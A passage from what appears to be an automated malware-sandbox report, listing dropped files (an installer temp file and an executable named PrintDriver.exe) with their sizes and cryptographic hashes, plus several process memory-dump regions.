                                8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                SHA512

                                6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                              • C:\Windows\Installer\MSIC922.tmp

                                Filesize

                                418KB

                                MD5

                                432827ec55428786a447b3d848d963b7

                                SHA1

                                029901586604f3ab1b0bd18868469a96db0ef470

                                SHA256

                                5a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0

                                SHA512

                                efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226

                              • \Games\PrintDriver.exe

                                Filesize

                                2.8MB

                                MD5

                                27c1c264c6fce4a5f44419f1783db8e0

                                SHA1

                                e071486e4dfef3a13f958a252d7000d3ce7bfd89

                                SHA256

                                29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

                                SHA512

                                a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

                              • memory/900-224-0x00000000024A0000-0x00000000024B0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1152-239-0x0000000000190000-0x0000000000192000-memory.dmp

                                Filesize

                                8KB

                              • memory/1160-159-0x0000000000310000-0x0000000000312000-memory.dmp

                                Filesize

                                8KB

                              • memory/1640-170-0x00000000002C0000-0x00000000002C2000-memory.dmp

                                Filesize

                                8KB

                              • memory/2532-0-0x0000000000250000-0x0000000000251000-memory.dmp

                                Filesize

                                4KB

                              We care about your privacy.

                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.